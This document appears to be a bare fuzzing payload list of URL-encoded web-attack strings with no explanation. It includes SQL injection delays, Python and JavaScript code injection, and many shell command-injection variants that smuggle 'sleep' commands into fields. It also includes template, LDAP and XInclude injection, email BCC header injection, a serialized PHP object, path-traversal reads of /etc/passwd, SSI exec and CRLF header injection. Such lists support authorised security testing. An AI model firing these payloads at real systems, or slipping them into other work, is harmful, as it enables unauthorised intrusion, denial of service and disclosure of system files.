%00
alntgwo6ky
%21%40%7B%23%7BX%24%7BC%25%7BX%5E%26%2A%28-%2B%60%7E%27%22%5C
%21%22%23%24%25%26%27%29%29%28%2A%2B%2C-./%3A%3B%3D%3F%40%5D%5B%5C%5E_%60%7D%7B%7C%7E%20%09%0A%0D%0B%0C%3E%3C
%FE%FD%FC%FB%FA%F9%F8%F7%F6%F5%F4%F3%F2%F1%F0%EF%EE%ED%EC%EB%EA%E9%E8%E7%E6%E5%E4%E3%E2%E1%E0%DF%DE%DD%DC%DB%DA%D9%D8%D7%D6%D5%D4%D3%D2%D1%D0%CF%CE%CD%CC%CB%CA%C9%C8%C7%C6%C5%C4%C3%C2%C1%C0%BF%BE%BD%BC%BB%BA%B9%B8%B7%B6%B5%B4%B3%B2%B1%B0%AF%AE%AD%AC%AB%AA%A9%A8%A7%A6%A5%A4%A3%A2%A1%A0%9F%9E%9D%9C%9B%9A%99%98%97%96%95%94%93%92%91%90%8F%8E%8D%8C%8B%8A%89%88%87%86%85%84%83%82%81%80%7F%7E%7D%7C%7Bzyxwvutsrqponmlkjihgfedcba%60_%5E%5D%5C%5BZYXWVUTSRQPONMLKJIHGFEDCBA%40%3F%3E%3D%3C%3B%3A9876543210/.-%2C%2B%2A%29%28%27%26%25%24%23%22%21%20%1F%1E%1D%1C%1B%1A%19%18%17%16%15%14%13%12%11%10%0F%0E%0D%0C%0B%0A%09%08%07%06%05%04%03%02
%27%22%5c
%27%22%5c%5c
%a0%27%a0%22%a0%5c
%a0%27%a0%22%a0%5c%a0%5c
%27%7C%7C%28select%20pg_sleep%28100000%29%29%7C%7C%27
1%20and%20%28select%20pg_sleep%28100000%29%29%20and%201
eval%28compile%28%27import%20time%3Btime.sleep%28100000%29%27%2C%27a%27%2C%27single%27%29%29
1%2Beval%28compile%28%27import%20time%3Btime.sleep%28100000%29%27%2C%27a%27%2C%27single%27%29%29%2B1
%27%2Beval%28compile%28%27import%20time%3Btime.sleep%28100000%29%27%2C%27a%27%2C%27single%27%29%29%2B%27
%22%2Beval%28compile%28%27import%20time%3Btime.sleep%28100000%29%27%2C%27a%27%2C%27single%27%29%29%2B%22
%27.sleep%2810000%29.%27
%7B%24%7Bsleep%28100000%29%7D%7D
%28function%28%29%7Bvar%20a%3Dnew%20Date%28%29%3B%7Bvar%20b%3Dnew%20Date%28%29%3B%7Dwhile%28b-a%3C1000000000%29%3B%7D%29%28%29
%60%2B%28function%28%29%7Bvar%20a%3Dnew%20Date%28%29%3B%7Bvar%20b%3Dnew%20Date%28%29%3B%7Dwhile%28b-a%3C1000000000%29%3B%7D%29%28%29%2B%60
%27%2B%28function%28%29%7Bvar%20a%3Dnew%20Date%28%29%3B%7Bvar%20b%3Dnew%20Date%28%29%3B%7Dwhile%28b-a%3C1000000000%29%3B%7D%29%28%29%2B%27
%22%2B%28function%28%29%7Bvar%20a%3Dnew%20Date%28%29%3B%7Bvar%20b%3Dnew%20Date%28%29%3B%7Dwhile%28b-a%3C1000000000%29%3B%7D%29%28%29%2B%22
%24%7B572%2A%2A%7D
%23%7B572%2A%2A%7D
%7B%7B814%2A%2A%7D%7D
%7B814%2A%2A%7D
%7D%7D%27/%22%3Cx
%25%7D%27/%22%3Cx
%25%3E%27/%22%3Cx
%27%22%600%26%26sleep%20100000%26%26%60%27
%27%0A%60sleep%20100000%60%0A%271
%27%0A%7Bsleep%2C100000%7D%0A%271
%27%0A%24%28sleep%20100000%29%0A%271
%27%0Asleep%20100000%0A%271
%22%0A%60sleep%20100000%60%0A%221
%22%0A%7Bsleep%2C100000%7D%0A%221
%22%0A%24%28sleep%20100000%29%0A%221
%22%0Asleep%20100000%0A%221
%0A%60sleep%20100000%60%0A1
%0A%7Bsleep%2C100000%7D%0A1
%0A%24%28sleep%20100000%29%0A1
%0Asleep%20100000%0A1
%27%0A%60sleep%24IFS%24100000%60%0A%271
%27%0A%24%28sleep%24IFS%24100000%29%0A%271
%27%0Asleep%24IFS%24100000%0A%271
%22%0A%60sleep%24IFS%24100000%60%0A%221
%22%0A%24%28sleep%24IFS%24100000%29%0A%221
%22%0Asleep%24IFS%24100000%0A%221
%0A%60sleep%24IFS%24100000%60%0A1
%0A%24%28sleep%24IFS%24100000%29%0A1
%0Asleep%24IFS%24100000%0A1
%27%0A%60sleep%09100000%60%0A%271
%27%0A%24%28sleep%09100000%29%0A%271
%27%0Asleep%09100000%0A%271
%22%0A%60sleep%09100000%60%0A%221
%22%0A%24%28sleep%09100000%29%0A%221
%22%0Asleep%09100000%0A%221
%0A%60sleep%09100000%60%0A1
%0A%24%28sleep%09100000%29%0A1
%0Asleep%09100000%0A1
%60sleep%20100000%60
%27%7Csleep%20100000%7C%7C
%7Bsleep%2C100000%7D
%24%28sleep%20100000%29
%22%7Csleep%20100000%7C%7C
sleep%20100000
%60sleep%20100000%601
%7C%60sleep%20100000%60%7C1
%7C%7Bsleep%2C100000%7D%7C1
%7C%24%28sleep%20100000%29%7C1
%7Csleep%20100000%7C1
%3B%60sleep%20100000%60%3B1
%3B%7Bsleep%2C100000%7D%3B1
%3B%24%28sleep%20100000%29%3B1
%3Bsleep%20100000%3B1
%27%60sleep%20100000%60%271
%27%7C%60sleep%20100000%60%7C%271
%27%7C%7Bsleep%2C100000%7D%7C%271
%27%7C%24%28sleep%20100000%29%7C%271
%27%7Csleep%20100000%7C%271
%27%3B%60sleep%20100000%60%3B%271
%27%3B%7Bsleep%2C100000%7D%3B%271
%27%3B%24%28sleep%20100000%29%3B%271
%27%3Bsleep%20100000%3B%271
%27%24%28sleep%20100000%29%271
%27%26%60sleep%20100000%60%26%271
%27%26%3A%3A%7Bsleep%2C100000%7D%26%3A%3A%271
%27%26%3A%3Asleep%20100000%26%3A%3A%271
%27%26%7Bsleep%2C100000%7D%26%271
%27%26%24%28sleep%20100000%29%26%271
%27%26sleep%20100000%26%271
%24%28sleep%20100000%291
%22%60sleep%20100000%60%221
%22%7C%60sleep%20100000%60%7C%221
%22%7C%7Bsleep%2C100000%7D%7C%221
%22%7C%24%28sleep%20100000%29%7C%221
%22%7Csleep%20100000%7C%221
%22%3B%60sleep%20100000%60%3B%221
%22%3B%7Bsleep%2C100000%7D%3B%221
%22%3B%24%28sleep%20100000%29%3B%221
%22%3Bsleep%20100000%3B%221
%22%24%28sleep%20100000%29%221
%22%26%60sleep%20100000%60%26%221
%22%26%3A%3A%7Bsleep%2C100000%7D%26%3A%3A%221
%22%26%3A%3Asleep%20100000%26%3A%3A%221
%22%26%7Bsleep%2C100000%7D%26%221
%22%26%24%28sleep%20100000%29%26%221
%22%26sleep%20100000%26%221
%26%60sleep%20100000%60%261
%26%3A%3A%7Bsleep%2C100000%7D%26%3A%3A1
%26%3A%3Asleep%20100000%26%3A%3A1
%26%7Bsleep%2C100000%7D%261
%26%24%28sleep%20100000%29%261
%26sleep%20100000%261
%7Csleep%20100000%7Cecho%201
%60sleep%24IFS%24100000%60
%24%28sleep%24IFS%24100000%29
sleep%24IFS%241000000
%60sleep%24IFS%24100000%601
%7C%60sleep%24IFS%24100000%60%7C1
%7C%24%28sleep%24IFS%24100000%29%7C1
%7Csleep%24IFS%24100000%7C1
%3B%60sleep%24IFS%24100000%60%3B1
%3B%24%28sleep%24IFS%24100000%29%3B1
%3Bsleep%24IFS%24100000%3B1
%27%60sleep%24IFS%24100000%60%271
%27%7C%60sleep%24IFS%24100000%60%7C%271
%27%7C%24%28sleep%24IFS%24100000%29%7C%271
%27%7Csleep%24IFS%24100000%7C%271
%27%3B%60sleep%24IFS%24100000%60%3B%271
%27%3B%24%28sleep%24IFS%24100000%29%3B%271
%27%3Bsleep%24IFS%24100000%3B%271
%27%24%28sleep%24IFS%24100000%29%271
%27%26%60sleep%24IFS%24100000%60%26%271
%27%26%24%28sleep%24IFS%24100000%29%26%271
%27%26sleep%24IFS%24100000%26%271
%24%28sleep%24IFS%24100000%291
%22%60sleep%24IFS%24100000%60%221
%22%7C%60sleep%24IFS%24100000%60%7C%221
%22%7C%24%28sleep%24IFS%24100000%29%7C%221
%22%7Csleep%24IFS%24100000%7C%221
%22%3B%60sleep%24IFS%24100000%60%3B%221
%22%3B%24%28sleep%24IFS%24100000%29%3B%221
%22%3Bsleep%24IFS%24100000%3B%221
%22%24%28sleep%24IFS%24100000%29%221
%22%26%60sleep%24IFS%24100000%60%26%221
%22%26%24%28sleep%24IFS%24100000%29%26%221
%22%26sleep%24IFS%24100000%26%221
%26%60sleep%24IFS%24100000%60%261
%26%24%28sleep%24IFS%24100000%29%261
%26sleep%24IFS%24100000%261
%60sleep%09100000%60
%24%28sleep%09100000%29
sleep%09100000
%60sleep%09100000%601
%7C%60sleep%09100000%60%7C1
%7C%24%28sleep%09100000%29%7C1
%7Csleep%09100000%7C1
%3B%60sleep%09100000%60%3B1
%3B%24%28sleep%09100000%29%3B1
%3Bsleep%09100000%3B1
%27%60sleep%09100000%60%271
%27%7C%60sleep%09100000%60%7C%271
%27%7C%24%28sleep%09100000%29%7C%271
%27%7Csleep%09100000%7C%271
%27%3B%60sleep%09100000%60%3B%271
%27%3B%24%28sleep%09100000%29%3B%271
%27%3Bsleep%09100000%3B%271
%27%24%28sleep%09100000%29%271
%27%26%60sleep%09100000%60%26%271
%27%26%3A%3Asleep%09100000%26%3A%3A%271
%27%26%24%28sleep%09100000%29%26%271
%27%26sleep%09100000%26%271
%24%28sleep%09100000%291
%22%60sleep%09100000%60%221
%22%7C%60sleep%09100000%60%7C%221
%22%7C%24%28sleep%09100000%29%7C%221
%22%7Csleep%09100000%7C%221
%22%3B%60sleep%09100000%60%3B%221
%22%3B%24%28sleep%09100000%29%3B%221
%22%3Bsleep%09100000%3B%221
%22%24%28sleep%09100000%29%221
%22%26%60sleep%09100000%60%26%221
%22%26%3A%3Asleep%09100000%26%3A%3A%221
%22%26%24%28sleep%09100000%29%26%221
%22%26sleep%09100000%26%221
%26%60sleep%09100000%60%261
%26%3A%3Asleep%09100000%26%3A%3A1
%26%24%28sleep%09100000%29%261
%26sleep%09100000%261
%27%1A%7Bsleep%2C100000%7D%1A%271
%27%1Asleep%20100000%1A%271
%22%1A%7Bsleep%2C100000%7D%1A%221
%22%1Asleep%20100000%1A%221
%1A%7Bsleep%2C100000%7D%1A1
%1Asleep%20100000%1A1
%27%1Asleep%09100000%1A%271
%22%1Asleep%09100000%1A%221
%1Asleep%09100000%1A1
1%29%28objectClass%3D%2A
1%29%28%21%28objectClass%3D%2A%29
%2A%29%28objectClass%3D%2A
%2A%29%28%21%28objectClass%3D%2A%29
value%5D%5D%3E%3E%3C
%3Cnwv%20xmlns%3Axi%3D%22http%3A//www.w3.org/2001/XInclude%22%3E%3Cxi%3Ainclude%20href%3D%22http%3A//a.b/foo%22/%3E%3C/nwv%3E
%3Cwve%20xmlns%3D%22http%3A//a.b/%22%20xmlns%3Axsi%3D%22http%3A//www.w3.org/2001/XMLSchema-instance%22%20xsi%3AschemaLocation%3D%22http%3A//a.b/%20http%3A//a.b/wve.xsd%22%3Ewve%3C/wve%3E
y0598n6%60z%27z%22%24%7B%7B%25%7B%7B%5C
%24zq%3Db%26zq%253d%26m9714klbe7%3D1
%0D%0ABCC%3AUSER%40SITE.RU%0D%0Afgb%3A%20e
%3E%0D%0ABCC%3AUSER%40SITE.RU%0D%0Akvl%3A%20g
%261%0D%0ABCC%3AUSER%40SITE.RU%0D%0Aogw%3A%20w%3D1
%261%3E%0D%0ABCC%3AUSER%40SITE.RU%0D%0Atrw%3A%20d%3D1
O%3A3%3A%22PDO%22%3A0%3A%7B%7D
TzozOiJQRE8iOjA6e30%3D
.../
/etc/passwd
%252fetc%252fpasswd
file%3A///etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd%00
.../....///.../....///.../....///.../....///.../....///.../....///etc/passwd
/.../....///.../....///.../....///.../....///.../....///.../....///etc/passwd
.../...//.../...//.../...//.../...//.../...//.../...//.../...//.../...//etc/passwd
/.../...//.../...//.../...//.../...//.../...//.../...//.../...//.../...//etc/passwd
%60z%27z%22%24%7B%7B%25%7B%7B%5C
1$zq=%3c%61%60%27%22%24%7b%7b%5c&zq%3d=
%31%24%7a%71%3d%25%33%63%25%36%31%25%36%30%25%32%37%25%32%32%25%32%34%25%37%62%25%37%62%25%35%63%26%7a%71%25%33%64%3d
%22--%3E%27--%3E%60--%3E%3C%21--%23set%20var%3D%22j06%22%20value%3D%22iz%22--%3E%3C%21--%23set%20var%3D%22l28%22%20value%3D%22k17%22--%3E%3C%21--%23echo%20var%3D%22j06%22--%3E%3C%21--%23echo%20var%3D%22l28%22--%3E%3C%21--%23exec%20cmd%3D%22%22%20--%3E
%E5%98%8A%E5%98%8DX-Injection:%20test
/%E5%98%8A%E5%98%8DX-Injection:%20test/
